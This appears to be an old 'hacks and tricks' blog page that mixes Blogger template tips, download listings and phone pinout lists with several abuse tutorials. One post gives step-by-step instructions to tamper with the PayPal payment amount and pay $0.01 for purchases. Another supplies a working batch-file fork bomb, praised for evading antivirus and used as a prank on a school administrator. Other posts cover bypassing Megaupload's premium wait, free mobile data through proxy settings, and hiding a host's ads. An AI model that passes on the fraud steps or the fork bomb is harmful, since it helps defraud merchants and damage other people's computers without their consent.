Tuesday, August 24, 2010

How to have megaupload fullspeed

Today I am going to show you how to trick megaupload and have full premium user speed.


Just follow these steps
1.What you have to do is to do a little modification to your link;


2.If the download link is link this:
http://www.megaupload.com/?d=b4ojjacg

3.What you have to do is just add” mgr_dl.php “(without the quote)after the .com/

4. Here is an example:

http://www.megaupload.com/mgr_dl.php?d=b4ojjacg

As you can see we have add the mgr_dl.php in the link

Now you are done, you don’t have to wait for countdown and other shit, enjoy full speed

Hack Paypal and pay $0.01 on every thing you buy

Here is a new trick to hack bank accounts using firefox and get pay money of your own choice no matter how much it costs. I tried this on Alertpay and Paypal and it worked for me.


Note: You must be using Firefox

1. Get his addon: https://addons.mozilla.org/en-US/firefox/addon/966

2. Find a site that requires you to pay (best if its software) at PayPal.

3. Find the paypal button (yellow one).

4. Go to Tools > Tamper Data

5. Click “Start Tamper” in the Interface

6. Click the PayPal button

7.A popup window will popup on the Data Tampering window asking you if you want to tamper the data. Press Yes

8. In the new window find the Text field that says “amount”

9. Change the amount to “00.00″ or “00.01″ (that is the amount you will pay)

10. Press OK and stop Tampering the data

11. You will get transfered to PayPals paying page and you will only need to pay the amount you inputed. Most of the sites will take you straight to the softwares download page instead of checking how much you payed, first.


I hope this helped.

How to make a Fork Bomb (Rabbit Virus)

Hey guys, I ‘ve got a new thing for all u guys to have fun with, its very easy and fun to do. Before we start coding ill explain what a fork bomb actually is.


A fork bomb or rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (blue screen of death). Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.
Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file the opens and application.

Background

Fork Bombs aka Rabbit viruses have been around for ages due to their effectiveness to evade anti-virus software. I came across it when i wanted to play a practical joke on my schools administrator for his birthday. Just to let you know it worked and hes not some n00b. I find them very effective just don’t bomb yourself.

The code

Ok this is the code that you type into notepad.exe remember to save it as a .bat or if you want it in a dorminant for save it as a .txt

One more thing…I am not responsible if you kills your computer or somebody else computer with or without permission. Now that we have that out a the way here we go…


Blocks of code should be set as style “Formatted” like this.

:s
START %0
GOTO :s


Have fun guys and do leave your feedback about this article!

Airtel Free GPRS Tricks For august 2010

1.Custom HTTP Server:http://202.65.157.201.server4.operamini.com/

2.Custom Socket Server:http://202.65.157.201.server4.operamini.com/
3.Front Query:http://202.65.157.201.t9space.com/power/m/http/

Download Opera Mini 5 Beta And Enjoy Friends..

Cool Trick with Google Images

yea.. Just browsing through the internet this morning and found this cool trick with Google Images and want to share it with you guys!


1. First go to Google Images : images.google.com
2. Search for anything you want like "flowers , cats , dogs,etc"
3. Next, you'll see lot of image thumbnails as usual...
4. Now, here is the trick :
Just copy and paste this code in your address bar and press Enter.
See what happens.. (surprise for you... )


javascript:R= 0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images ; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math. sin(R*x1+ i*x2+x3)* x4+x5; DIS.top=Math. cos(R*y1+ i*y2+y3)* y4+y5}R++ }setInterval('A()',5); void(0)

How to add Flying "Scroll to Top" button to your Blogger blog using Jquery

If your Blog has lot of long posts, adding a cool flying 'Scroll to Top' link makes it easier for your visitors to quickly navigate your pages.


Most of you have already known about how to add 'scroll to top' by adding simple '#top' to your links. But, this one uses Jquery which makes it really smooth ( you really like it for sure).

So, lets learn how to add it to your Blogger blog..
1. Go to Layout » Edit html

Find

</body>
Add before

<a href="#" id="backtotop">^ Scroll to Top</a>
<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js' type='text/javascript'></script>
<script type='text/javascript'>
/*-----------------------
*Scroll to top
-----------------------*/
$(function(){$.fn.scrollToTop=function(){$(this).hide().removeAttr("href");if($(window).scrollTop()!="0"){$(this).fadeIn("slow")}var scrollDiv=$(this);$(window).scroll(function(){if($(window).scrollTop()=="0"){$(scrollDiv).fadeOut("slow")}else{$(scrollDiv).fadeIn("slow")}});$(this).click(function(){$("html, body").animate({scrollTop:0},"slow")})}});
$(function() {
$("#toTop").scrollToTop();
});
</script>


2. Find

]]></b:skin>
Add before


#backtotop { width:100px;background:#F4FFBF;border:1px solid #ccc;text-align:center;padding:5px;position:fixed;bottom:10px;right:10px;cursor:pointer;color:#666;text-decoration:none; }

How to Post Larger (HQ) Images in Blogger Posts

This is one of the most wanted blogger hacks, which makes it possible to post big size pictures in blogger posts.


Normally, If you upload a large image to blogger(with large thumb size selected), it will automatically resize it and then post it as thumbnail . But, the image quality of the resized image is very poor. So, to make the image look more clean and sharper, this trick will come handy.

Normally Uploaded Image: (with large thumbnail selected)


Image after applying the hack:
So, lets learn how to do this..
1.First, calculate how much image size(large) you want to display ( normally, its just a bit less than your main body width). Suppose, take this blog as an example, the main body width is about 570px. So, the maximum width to post a large image is 570px. But, to make the image looks nice, we have to give some padding to it.so,choose the width which is a bit less than the post body width.. like 560px.
Now, Go to Layout » Edit html
Find this

]]></b:skin>

Add this before that line:

img {
max-width: 560px;
width: expression(this.width > 560 ? 560: true);
}

Change the value in red depending on the previous step.

Note: Do check if you have the img{ tag already in your template. If its there, just add the additional couple of lines to it.


max-width: 560px;
width: expression(this.width > 560 ? 560: true);


Save the changes.

2. Now, while doing your posts, upload the images normally like you did previously. Once the image is uploaded, go to Edit html tab, and the image code will look something like this

<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Toi-rh0Nm00/Sj_K-nCkxWI/AAAAAAAADbg/8QRq-hHP4xM/s1600-h/megan+fox.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 280px; height: 400px;" src="http://4.bp.blogspot.com/_Toi-rh0Nm00/Sj_K-nCkxWI/AAAAAAAADbg/8QRq-hHP4xM/s400/megan+fox.jpg" alt="Normal Picture without the hack" id="BLOGGER_PHOTO_ID_5350218059319919970" border="0" /></a>


All you have to do is Just remove that bolded text (width and height attributes) and replace s400 to s800.

So, the final code looks like this

<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Toi-rh0Nm00/Sj_K-nCkxWI/AAAAAAAADbg/8QRq-hHP4xM/s1600-h/megan+fox.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://4.bp.blogspot.com/_Toi-rh0Nm00/Sj_K-nCkxWI/AAAAAAAADbg/8QRq-hHP4xM/s800/megan+fox.jpg" alt="Normal Picture without the hack" id="BLOGGER_PHOTO_ID_5350218059319919970" border="0" /></a>


Done! Now, your uploaded image will look big in the post.

How to Create Static Pages in Blogger

Recently, Blogger launched the much awaited Blogger Pages Feature.

So, lets see how to Create Static Pages in Blogger.

1. Sign into Blogger Draft (draft.blogger.com)
2. Click on New Post as usual

3. Select the Edit Pages from the top menu

4. Click on 'New Page' button.

5. Now, give your page a title and write the content and publish the page.

6. If you want to display the Pages list in your Blog sidebar, select the 'Blog Sidebar' option,or you can keep it as nav menu below header by selecting 'Blog Tabs' option.


Note: If You've Selected either 'Blog Sidebar' or ' Blog Tabs ' option and if you see any bx-error,.. then, come back to last page and select 'No Gadget' option.

This means,you have to add the links manually to your template.

Click on Edit Pages again and Right Click on View -> Copy link location (in firefox) and Add the link manually in your sidebar via Link widget or you can add the link in your navigation bar via template > edit html.
Thanks to Blogger for the Awesome feature.. :D

How to Make your Blogger Blog ready for Mobile Phones

As you know, millions of people use their mobile phones to access internet. The mobile internet speed is also very fast these days with 3G's , mobile apps,etc.
From this, we can say many of your readers are coming to your blog through mobile phones..But, if you don't make your blog mobile friendly, .you may lose all your mobile readers because in a mobile phone, a normal blog takes lot of time to load and there are other issues that your site not fitting properly in the mobile screen.

So, here is how to make your Blogger (blogspot) blog mobile internet friendly..

Sign into your Blogger account > Design > Edit html

Find this line..
<b:include data='blog' name='all-head-content'/>


Paste this code below that line...
<meta content='IE=EmulateIE7' http-equiv='X-UA-Compatible'/>
<b:if cond='data:blog.isMobile'>
<meta content='width=device-width, initial-scale=1.0, user-scalable=0' name='viewport'/>
<b:else/>
<meta content='width=1100' name='viewport'/>
</b:if>


Save the Changes!

That's it! Now, your visitors can access your blogger blog through mobile phones with blazing speed...

55 Amazing mobile animations


55 JPG | 240x320 | 12.8 Mb | Hf
55 Amazing mobile animations



DOWNLOAD

90 themes for Windows XP


Windows xp | 90 | 69,7 Mb


Install :
copy the files in the theme folder to it, and here C: WINDOWSResourcesThemes!
DOWNLOAD

Best Mixed Wallpapers Pack (78)


92 JPG | 1280x1024 - 2560X1600 | 57,4 mb


DOWNLOAD FROM LETBIT

Windows Live Final Theme for Windows 7


Windows 7 | 2010 | 24 Mb



DOWNLOAD

Airena Wallpapers Pack 18


45 | 1600х1200 - 1920х1200 | JPG | 48 Мб


Download:
http://letitbit.net/download/4606.46a91e718577678ff079a75c94c026de/Airena_Wallpapers_Pack_18.rar.html

Samsung Mobile_Phone_Hardware_Repair_Series_3 in one EXE


Samsung Mobile_Phone_Hardware_Repair_Series_3 in one EXE

Download

Nokia N8 Themes


Nokia N8 Themes

GSM DZ Finder v1.01 by smail002


Supported Models:
Nokia Lcd Matching software
Nokia Cable compatibility
3250,3500c,5200,5310,5610xm,5700,6110n
6120c,6125,6131,6233,6234,6270,6280,6300
6630,6680,7390,7610b,7900,8600,8800e,E50
E51,E60,E61,E61i,E65,E66,E70,E75,E90,N70
N73,N76,N77,N80,N81,N90,N91,N92,N93i,N95
N95 8GB,5500,6085,6151,6267,6500c,6500s
7370s,7373,7500,N93

DOWNLOAD

All nokia Data cable pinout pack

New USB Driver For ALL Samsung


Supported Models:
- Simmental Driver
- Siberian Driver
- Swallowtail Driver
- Semseyite Driver
- Sloan Driver
- Spencer Driver
- Schorl Driver
- EMPChipset Driver
- HSP Driver
- HSP Plus Driver
- Symbian USB Download Driver
- Symbian Samsung PC DLC Driver
- Sherwsbury Driver
- EMP Chipset2 Driver
- Zinia Serial Driver
- VIA Driver
- NXP Driver
- MS USB Modem Driver
- CDMA USB Modem Driver
- WCDMA USB Modem Driver
- Qualcomm USB Driver

DOWNLOAD

All nokia Data cable pinout pack




All nokia Data cable pinout pack

Supported Modeles:

1100,1680,2600c,2630,2680s,2760,3250
3500,3600s,3610a,3650,5100,5140,5300
5310xm,5320d,5700,5800,6060,6101,6110n
6111,6120c,6125,6131,6170,6210s,6220c
6268,6270,6280,6290,6500c,6500s,6600,6620
6630,6650d,6681,6820,7070,7100s,7260,7370
7390,7500,7510s,7710,8600d,8800e,8600d
8800e,9300,9500,e50,e51,e60,e63,e65
e66,e90,n70,n71
DOWNLOAD

Nokia Short Solution


Nokia Short Solution

Supported Modeles:
1xxx,2xxx,120x,1650,1680,2630
3110,3500,5200,5300,5310,6300
6600 slid,6670,7610,6070 Same
6085,6086,6111,6131 Same
DOWNLOAD

New Page Popularity Widgets for Your Blog and Websites

FoxRecord is a page popularity widgets provider for blogs or websites. FoxRecord don't use javascript to load the widget. It uses small images.


Features of FoxRecord :

* It is fast compared to others who provide similar widget.
* It increases your traffic
* It boost your search engine rankings
* Easy to install, needs only two steps to install in you blog or website.


FoxRecord provides -- Page Popularity Widget, Top Popular Page Widget and Thank You Widget


Get ForxRecord Widget

Remove Banner Ad from Godaddy Free Web Hosting Pages

When you purchase domain from the Godaddy you will get free web hosting for life. As you know if the hosting is free than they put ads on your pages to earn some money for running cost. Same thing for godaddy also,they put ads on top of each page. There is no option of reducing the size of the ad and you cannot put ad in different places. So here i have given trick to remove ad banner from the godaddy free web hosting. Demo page that i have removed ad.


Cut and Paste the following CSS code in between <head> and <head> tag

<style>
#conash3D0
{
display:none;
}
</style>

This code work untill the godaddy team uses iframe ID as conash3D0
Finding iframe ID

1. Open you ad displayed page
2. Right click on the page and click on 'View Page Source'
3. At the end of the source page you will find script defined. Note down the .js file.


In my case it is https://a12.alphagodaddy.com/hosting_ads/gd01.js

4. Put this .js link in address bar of the browser and hit enter. You will see javascript source code.
5. Search for 'iframe id' value in the source code. That is ur iframe id(may be conash3D0)

Ad Removed Page demo

ufc selector and 2n2 locations - (2) PINOUTS FOR MOBILES



nokia NOKIA 2n2
3100 2n2
3110/6300 2n2
1202 pinout 3200 2n2
1203 pinout 3210 2n2
1600 1100 1200 1208 pinout 3230 2n2
1661 pinout 3250 2n2
1680 / 1680c pinout 3300 2n2
222oc pinout 3310 2n2
2330c pinout 3310 2n2
2630 pinout 3390 2n2
2600c pinout 3500 2n2
2700c pinout 3650 2n2
2720a pinout 5100 2n2
2730 pinout 5140 2n2
2760 pinout 5300 2n2
3100 pinout -------- 3100 2n2 5500 2n2
3109 pinout 6020 2n2
3120 ( 3120c ) pinout 6070 2n2
3250 pinout --- 3250 2n2 6085 2n2
3600s pinout 6101 2n2
3610 pinout 6111 2n2
3720 pinout 6233 2n2
5130c pinout 6234 2n2
5220 pinout 6260 2n2
5320 pinout 6270 2n2
5500 pinout 6280 2n2
5730 pinout 6300 2n2
5800 d pinout 6600 2n2
6060 pinout 6610 2n2
6085 pinout 6630 2n2
6101 pinout 6680 2n2
6110 n pinout 6800 2n2
6111 pinout 7200 2n2
6120 (6120c) pinout 7270 2n2
6125 pinout 7373 2n2
6131 pinout 7610 2n2
6151 pinout 7650 2n2
6170 pinouts 8310 2n2
6210 / 6210s 9300 2n2
6220 pinout 9500 2n2
6233 pinout n70 2n2
6234 pin outs n71 2n2
6255 pinout n73 2n2
6267 pinout n80 2n2
6270 pinout n90 2n2
6280 pinouts n91 2n2
6290 pinout n93 2n2
6300 pinout Ngage 2n2
6303 pinout
6500 / 6500c pinout BOX pinouts
6500 /6500s pinout SETOOL , INFINITY , Z3x , UST
6555 pinouts JAF , nspro , cyclone
6600 pinout RJ45 pinout
6600s pinout
6610 pinout CHINAPHONE PINOUTs
7210 MYphone B50 pinout
6250 pinout myphone MS28 DUO pinout
7250i Myphone Q21 DUO pinout
3200 pinouts myphone S21 pinout
6620 pinout myphone T11 pinout
6630 pinout myphone T22 pinout
6650 d pinout myphone B23 PINOUT
6680 pinout 6300 china pinouts
6681 pinout 5310 chinA PINOUTS
6820 pinout etc
6700 / 6700c pinout
6710 / 6710s pinout samsung pinouts
6720 / 6720c pinout d500 cable pinout
6730 / 6730c pinout d800 cable pinout
6790 / 6790c pinout d820 cable pinout
7100 / 7100s pinout e210 cable pinout
7070 pinout e810 cable pinout
7170 pinout E700 cable pinout
7390 pinout J750 cable pinout
7500 pinout m120 cable pinout
7510 / 7510a pinout Etc.
7610 / 7610s pinout
7710 pinout
8600 pinout
8800 pinout
9300 pinout
9500 pinout
E50 PINOUT alcatel cable pinout
e51 pinout LG cable pinouts
E52 pinouts benQ SAGEM pinouts
E60 pin out
e61 pinout
e61i pin out
E65 pinout
e66 pinout
e66i pin out
E71 pinout
E75 pinout
E90 pinout
n70 pinout
n71 pinout
n73 pinout
n76 pin out
n77 pinout
n78 pinout
n79 pinout
n80 pin out
n81 pinout
n82 pinout
n85 pin out
n86 pin outs
n90 pinout
n91 pinouts
n92 pinout
n92i pinouts
N93 pinout
n95 pinout
n95 8gig pinout
n96 pinout
n97 pinout
n9000 pinout
ngage pinout
X6 pinout

DOWNLOAD

ufc selector & 2n2 locations